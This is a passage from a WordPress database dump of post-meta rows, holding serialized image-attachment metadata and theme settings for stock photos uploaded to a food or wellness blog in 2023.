0;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:125980;}s:21:\"succulents_qodef_huge\";a:5:{s:4:\"file\";s:47:\"emma-simpson-mNGaaLeWEp0-unsplash-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:240294;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:37:\"emma-simpson-mNGaaLeWEp0-unsplash.jpg\";}'),(14608,5522,'_edit_lock','1696944630:3'),(14595,5519,'_thumbnail_id','5520'),(14596,5519,'_edit_last','3'),(14597,5519,'qodef_page_content_behind_header_meta','no'),(14598,5519,'qodef_boxed_background_image_attachment_meta','fixed'),(14599,5519,'qodef_blog_list_featured_image_meta','http://tummyrevolution.com/wp-content/uploads/2023/09/emma-simpson-mNGaaLeWEp0-unsplash-scaled.jpg'),(14600,5519,'qodef_blog_masonry_gallery_fixed_dimensions_meta','default'),(14601,5519,'qodef_blog_masonry_gallery_original_dimensions_meta','default'),(14602,5519,'qodef_video_type_meta','social_networks'),(14603,5519,'qodef_audio_type_meta','social_networks'),(14604,5519,'qodef_post_skin','qodef-post-light-skin'),(14605,5519,'qodef_disable_vertical_header_background_image_meta','no'),(14606,5519,'qodef_disable_header_widget_logo_area_meta','no'),(14607,5519,'qodef_disable_header_widget_menu_area_meta','no'),(14609,5523,'_wp_attached_file','2023/09/lee-myungseong-y1XXWct5rBo-unsplash-scaled.jpg'),(14610,5523,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:2560;s:6:\"height\";i:1704;s:4:\"file\";s:54:\"2023/09/lee-myungseong-y1XXWct5rBo-unsplash-scaled.jpg\";s:8:\"filesize\";i:528781;s:5:\"sizes\";a:10:{s:6:\"medium\";a:5:{s:4:\"file\";s:47:\"lee-myungseong-y1XXWct5rBo-unsplash-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20409;}s:5:\"large\";a:5:{s:4:\"file\";s:48:\"lee-myungseong-y1XXWct5rBo-unsplash-1024x682.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:135139;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:47:\"lee-myungseong-y1XXWct5rBo-unsplash-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9626;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:47:\"lee-myungseong-y1XXWct5rBo-unsplash-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:86428;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:49:\"lee-myungseong-y1XXWct5rBo-unsplash-1536x1022.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1022;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:247425;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:49:\"lee-myungseong-y1XXWct5rBo-unsplash-2048x1363.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1363;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:386967;}s:23:\"succulents_qodef_square\";a:5:{s:4:\"file\";s:47:\"lee-myungseong-y1XXWct5rBo-unsplash-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:70652;}s:26:\"succulents_qodef_landscape\";a:5:{s:4:\"file\";s:48:\"lee-myungseong-y1XXWct5rBo-unsplash-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:119446;}s:25:\"succulents_qodef_portrait\";a:5:{s:4:\"file\";s:48:\"lee-myungseong-y1XXWct5rBo-unsplash-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:105027;}s:21:\"succulents_qodef_huge\";a:5:{s:4:\"file\";s:49:\"lee-myungseong-y1XXWct5rBo-unsplash-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:199563;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:39:\"lee-myungseong-y1XXWct5rBo-unsplash.jpg\";}'),(14633,5526,'_edit_lock','1697096542:1'),(14613,5522,'_thumbnail_id','5523'),(14614,5522,'_edit_last','3'),(14615,5522,'qodef_page_content_behind_header_meta','no'),(14616,5522,'qodef_boxed_background_image_attachment_meta','fixed'),(14617,5522,'qodef_blog_list_featured_image_meta','http://tummyrevolution.com/wp-content/uploads/2023/09/lee-myungseong-y1XXWct5rBo-unsplash-scaled.jpg'),(14618,5522,'qodef_blog_masonry_gallery_fixed_dimensions_meta','default'),(14619,5522,'qodef_blog_masonry_gallery_original_dimensions_meta','default'),(14620,5522,'qodef_video_type_meta','social_networks'),(14621,5522,'qodef_audio_type_meta','social_networks'),(14622,5522,'qodef_post_skin','qodef-post-light-skin'),(14623,5522,'qodef_disable_vertical_header_background_image_meta','no'),(14624,5522,'qodef_disable_header_widget_logo_area_meta','no'),(14625,5522,'qodef_disable_header_widget_menu_area_meta','no'),(14634,5526,'_oembed_119f9f45235d9a14ff22392c2c894ab6',''),(14635,5526,'_oembed_time_119f9f45235d9a14ff22392c2c894ab6','1694610388'),(14636,5526,'_oembed_a838ff62e883281218531f2cc87ab067',''),(14637,5526,'_oembed_time_a838ff62e883281218531f2cc87ab067','1694610388'),(14638,5527,'_wp_attached_file','2023/09/samuel-regan-asante-jsley_wlVOA-unsplash-scaled.jpg'),(14639,5527,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:1707;s:6:\"height\";i:2560;s:4:\"file\";s:59:\"2023/09/samuel-regan-asante-jsley_wlVOA-unsplash-scaled.jpg\";s:8:\"filesize\";i:803586;s:5:\"sizes\";a:10:{s:6:\"medium\";a:5:{s:4:\"file\";s:52:\"samuel-regan-asante-jsley_wlVOA-unsplash-200x300.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14504;}s:5:\"large\";a:5:{s:4:\"file\";s:53:\"samuel-regan-asante-jsley_wlVOA-unsplash-683x1024.jpg\";s:5:\"width\";i:683;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:108682;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:52:\"samuel-regan-asante-jsley_wlVOA-unsplash-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6824;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:53:\"samuel-regan-asante-jsley_wlVOA-unsplash-768x1152.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:135181;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:54:\"samuel-regan-asante-jsley_wlVOA-unsplash-1024x1536.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:242244;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:54:\"samuel-regan-asante-jsley_wlVOA-unsplash-1365x2048.jpg\";s:5:\"width\";i:1365;s:6:\"height\";i:2048;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:467100;}s:23:\"succulents_qodef_square\";a:5:{s:4:\"file\";s:52:\"samuel-regan-asante-jsley_wlVOA-unsplash-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:51695;}s:26:\"succulents_qodef_landscape\";a:5:{s:4:\"file\";s:53:\"samuel-regan-asante-jsley_wlVOA-unsplash-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:98523;}s:25:\"succulents_qodef_portrait\";a:5:{s:4:\"file\";s:53:\"samuel-regan-asante-jsley_wlVOA-unsplash-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:96354;}s:21:\"succulents_qodef_huge\";a:5:{s:4:\"file\";s:54:\"samuel-regan-asante-jsley_wlVOA-unsplash-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:195093;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:44:\"samuel-regan-asante-jsley_wlVOA-unsplash.jpg\";}'),(14640,5528,'_wp_attached_file','2023/09/tummy-pic.jpg'),(14641,5528,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1200;s:6:\"height\";i:943;s:4:\"file\";s:21:\"2023/09/tummy-pic.jpg\";s:8:\"filesize\";i:453727;s:5:\"sizes\";a:8:{s:6:\"medium\";a:5:{s:4:\"file\";s:21:\"tummy-pic-300x236.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:236;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15980;}s:5:\"large\";a:5:{s:4:\"file\";s:22:\"tummy-pic-1024x805.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:805;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:125687;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:21:\"tummy-pic-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6621;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:21:\"tummy-pic-768x604.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:604;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:74029;}s:23:\"succulents_qodef_square\";a:5:{s:4:\"file\";s:21:\"tummy-pic-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:50766;}s:26:\"succulents_qodef_landscape\";a:5:{s:4:\"file\";s:22:\"tummy-pic-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:95030;}s:25:\"succulents_qodef_portrait\";a:5:{s:4:\"file\";s:21:\"tummy-pic-550x943.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:943;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:94352;}s:21:\"succulents_qodef_huge\";a:5:{s:4:\"file\";s:22:\"tummy-pic-1100x943.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:943;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:181497;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(14642,5529,'_wp_attached_file','2023/09/pexels-alicia-harper-7510940-scaled.jpg'),(14643,5529,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:2560;s:6:\"height\";i:1708;s:4:\"file\";s:47:\"2023/09/pexels-alicia-harper-7510940-scaled.jpg\";s:8:\"filesize\";i:522049;s:5:\"sizes\";a:10:{s:6:\"medium\";a:5:{s:4:\"file\";s:40:\"pexels-alicia-harper-7510940-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13260;}s:5:\"large\";a:5:{s:4:\"file\";s:41:\"pexels-alicia-harper-7510940-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:122173;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:40:\"pexels-alicia-harper-7510940-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6039;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:40:\"pexels-alicia-harper-7510940-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:73869;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:42:\"pexels-alicia-harper-7510940-1536x1025.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1025;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:239862;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:42:\"pexels-alicia-harper-7510940-2048x1366.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1366;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:375643;}s:23:\"succulents_qodef_square\";a:5:{s:4:\"file\";s:40:\"pexels-alicia-harper-7510940-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:60538;}s:26:\"succulents_qodef_landscape\";a:5:{s:4:\"file\";s:41:\"pexels-alicia-harper-7510940-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:107882;}s:25:\"succulents_qodef_portrait\";a:5:{s:4:\"file\";s:41:\"pexels-alicia-harper-7510940-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:102792;}s:21:\"succulents_qodef_huge\";a:5:{s:4:\"file\";s:42:\"pexels-alicia-harper-7510940-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:191673;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:32:\"pexels-alicia-harper-7510940.jpg\";}'),(14644,5530,'_wp_attached_file','2023/09/pexels-karley-saagi-2064692-scaled.jpg'),(14645,5530,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:2048;s:6:\"height\";i:2560;s:4:\"file\";s:46:\"2023/09/pexels-karley-saagi-2064692-scaled.jpg\";s:8:\"filesize\";i:945980;s:5:\"sizes\";a:10:{s:6:\"medium\";a:5:{s:4:\"file\";s:39:\"pexels-karley-saagi-2064692-240x300.jpg\";s:5:\"width\";i:240;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20607;}s:5:\"large\";a:5:{s:4:\"file\";s:40:\"pexels-karley-saagi-2064692-819x1024.jpg\";s:5:\"width\";i:819;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:167954;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:39:\"pexels-karley-saagi-2064692-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8194;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:39:\"pexels-karley-saagi-2064692-768x960.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:960;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:149874;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:41:\"pexels-karley-saagi-2064692-1229x1536.jpg\";s:5:\"width\";i:1229;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:345966;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:41:\"pexels-karley-saagi-2064692-1638x2048.jpg\";s:5:\"width\";i:1638;s:6:\"height\";i:2048;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:602923;}s:23:\"succulents_qodef_square\";a:5:{s:4:\"file\";s:39:\"pexels-karley-saagi-2064692-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:72417;}s:26:\"succulents_qodef_landscape\";a:5:{s:4:\"file\";s:40:\"pexels-karley-saagi-2064692-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:142270;}s:25:\"succulents_qodef_portrait\";a:5:{s:4:\"file\";s:40:\"pexels-karley-saagi-2064692-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:125615;}s:21:\"succulents_qodef_huge\";a:5:{s:4:\"file\";s:41:\"pexels-karley-saagi-2064692-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:240786;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:31:\"pexels-karley-saagi-2064692.jpg\";}'),(14646,5531,'_wp_attached_file','2023/09/pexels-polina-tankilevitch-4110334-scaled.jpg'),(14647,5531,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:1707;s:6:\"height\";i:2560;s:4:\"file\";s:53:\"2023/09/pexels-polina-tankilevitch-4110334-scaled.jpg\";s:8:\"filesize\";i:338333;s:5:\"sizes\";a:10:{s:6:\"medium\";a:5:{s:4:\"file\";s:46:\"pexels-polina-tankilevitch-4110334-200x300.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12989;}s:5:\"large\";a:5:{s:4:\"file\";s:47:\"pexels-polina-tankilevitch-4110334-683x1024.jpg\";s:5:\"width\";i:683;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:83781;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:46:\"pexels-polina-tankilevitch-4110334-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5771;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:47:\"pexels-polina-tankilevitch-4110334-768x1152.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:99623;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:48:\"pexels-polina-tankilevitch-4110334-1024x1536.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:153925;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:48:\"pexels-polina-tankilevitch-4110334-1365x2048.jpg\";s:5:\"width\";i:1365;s:6:\"height\";i:2048;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:238812;}s:23:\"succulents_qodef_square\";a:5:{s:4:\"file\";s:46:\"pexels-polina-tankilevitch-4110334-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:39143;}s:26:\"succulents_qodef_landscape\";a:5:{s:4:\"file\";s:47:\"pexels-polina-tankilevitch-4110334-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:58860;}s:25:\"succulents_qodef_portrait\";a:5:{s:4:\"file\";s:47:\"pexels-polina-tankilevitch-4110334-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:75615;}s:21:\"succulents_qodef_huge\";a:5:{s:4:\"file\";s:48:\"pexels-polina-tankilevitch-4110334-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:110694;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:38:\"pexels-polina-tankilevitch-4110334.jpg\";}'),(14648,5532,'_wp_attached_file','2023/09/pexels-jenvit-keiwalinsarid-3559899-scaled.jpg'),(14649,5532,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:2560;s:6:\"height\";i:1920;s:4:\"file\";s:54:\"2023/09/pexels-jenvit-keiwalinsarid-3559899-scaled.jpg\";s:8:\"filesize\";i:372370;s:5:\"sizes\";a:10:{s:6:\"medium\";a:5:{s:4:\"file\";s:47:\"pexels-jenvit-keiwalinsarid-3559899-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12033;}s:5:\"large\";a:5:{s:4:\"file\";s:48:\"pexels-jenvit-keiwalinsarid-3559899-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:75225;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:47:\"pexels-jenvit-keiwalinsarid-3559899-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5257;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:47:\"pexels-jenvit-keiwalinsarid-3559899-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:47439;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:49:\"pexels-jenvit-keiwalinsarid-3559899-1536x1152.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:149495;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:49:\"pexels-jenvit-keiwalinsarid-3559899-2048x1536.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:248501;}s:23:\"succulents_qodef_square\";a:5:{s:4:\"file\";s:47:\"pexels-jenvit-keiwalinsarid-3559899-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:32635;}s:26:\"succulents_qodef_landscape\";a:5:{s:4:\"file\";s:48:\"pexels-jenvit-keiwalinsarid-3559899-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:59200;}s:25:\"succulents_qodef_portrait\";a:5:{s:4:\"file\";s:48:\"pexels-jenvit-keiwalinsarid-3559899-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:45285;}s:21:\"succulents_qodef_huge\";a:5:{s:4:\"file\";s:49:\"pexels-jenvit-keiwalinsarid-3559899-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:101275;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:39:\"pexels-jenvit-keiwalinsarid-3559899.jpg\";}'),(14650,5526,'_thumbnail_id','5529'),(14651,5526,'_edit_last','1'),(14652,5526,'qodef_page_content_behind_header_meta','no'),(14653,5526,'qodef_boxed_background_image_attachment_meta','fixed'),(14654,5526,'qodef_blog_masonry_gallery_fixed_dimensions_meta','default'),(14655,5526,'qodef_blog_masonry_gallery_original_dimensions_meta','default'),(14656,5526,'qodef_video_type_meta','social_networks'),(14657,5526,'qodef_audio_type_meta','social_networks'),(14658,5526,'qodef_post_skin','qodef-post-light-skin'),(14659,5526,'qodef_disable_vertical_header_background_image_meta','no'),(14660,5526,'qodef_disable_header_widget_logo_area_meta','no'),(14661,5526,'qodef_disable_header_widget_menu_area_meta','no'),(14662,5534,'_edit_lock','1694619256:1'),(14663,5535,'_wp_attached_file','2023/09/pexels-pixabay-209620-scaled.jpg'),(14664,5535,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:2560;s:6:\"height\";i:1707;s:4:\"file\";s:40:\"2023/09/pexels-pixabay-209620-scaled.jpg\";s:8:\"filesize\";i:1169025;s:5:\"sizes\";a:10:{s:6:\"medium\";a:5:{s:4:\"file\";s:33:\"pexels-pixabay-209620-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24025;}s:5:\"large\";a:5:{s:4:\"file\";s:34:\"pexels-pixabay-209620-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:219081;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:33:\"pexels-pixabay-209620-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10047;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:33:\"pexels-pixabay-209620-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:130263;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:35:\"pexels-pixabay-209620-1536x1024.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\